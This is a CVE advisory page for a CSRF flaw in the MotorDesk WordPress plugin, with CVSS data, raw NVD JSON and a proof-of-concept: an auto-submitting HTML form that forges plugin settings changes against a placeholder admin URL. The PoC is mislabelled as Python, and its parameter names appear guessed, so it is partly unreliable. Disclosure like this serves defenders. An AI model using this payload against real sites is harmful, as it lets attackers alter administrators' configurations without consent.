Security Vulnerability Report
中文
CVE-2026-9724 CVSS 4.3 MEDIUM

CVE-2026-9724

Published: 2026-06-24 07:16:31
Last Modified: 2026-06-25 13:26:12

Description

The MotorDesk plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the motordesk_admin_home function. This makes it possible for unauthenticated attackers to update the plugin's configuration settings, including the search page URI and custom template directory path via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

MotorDesk for WordPress <= 1.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2026-9724 PoC - MotorDesk WordPress Plugin CSRF --> <!-- This PoC demonstrates how an attacker can exploit the missing nonce validation --> <!-- in the motordesk_admin_home function to modify plugin settings --> <!DOCTYPE html> <html> <head> <title>Loading...</title> </head> <body> <!-- Auto-submit form to exploit CSRF vulnerability --> <form id="csrf-form" action="http://target-wordpress-site.com/wp-admin/admin.php?page=motordesk" method="POST"> <!-- Parameters to modify the search page URI --> <input type="hidden" name="motordesk_search_uri" value="/malicious-search-page" /> <!-- Parameters to modify the custom template directory path --> <input type="hidden" name="motordesk_template_dir" value="/path/to/malicious/templates" /> <!-- Additional configuration parameters can be added here --> <input type="hidden" name="action" value="update_settings" /> </form> <script> // Auto-submit the form when the page loads document.getElementById('csrf-form').submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9724", "sourceIdentifier": "[email protected]", "published": "2026-06-24T07:16:30.530", "lastModified": "2026-06-25T13:26:11.740", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MotorDesk plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the motordesk_admin_home function. This makes it possible for unauthenticated attackers to update the plugin's configuration settings, including the search page URI and custom template directory path via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "affected": [{"source": "[email protected]", "affectedData": [{"vendor": "motordesk", "product": "MotorDesk", "defaultStatus": "unaffected", "versions": [{"version": "0", "lessThanOrEqual": "1.1.2", "versionType": "semver", "status": "affected"}]}]}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "ssvcV203": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "ssvcData": {"timestamp": "2026-06-24T12:37:56.707817Z", "id": "CVE-2026-9724", "options": [{"exploitation": "none"}, {"automatable": "no"}, {"technicalImpact": "partial"}], "role": "CISA Coordinator", "version": "2.0.3"}}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/motordesk/trunk/include/motordesk_admin.php#L122", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/motordesk/trunk/include/motordesk_admin.php#L134", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/motordesk/trunk/include/motordesk_admin.php#L157", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/motordesk/trunk/include/motordesk_admin.php#L182", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3e9421-809c-423a-afcf-28c061c00fad?source=cve", "source": "[email protected]"}]}}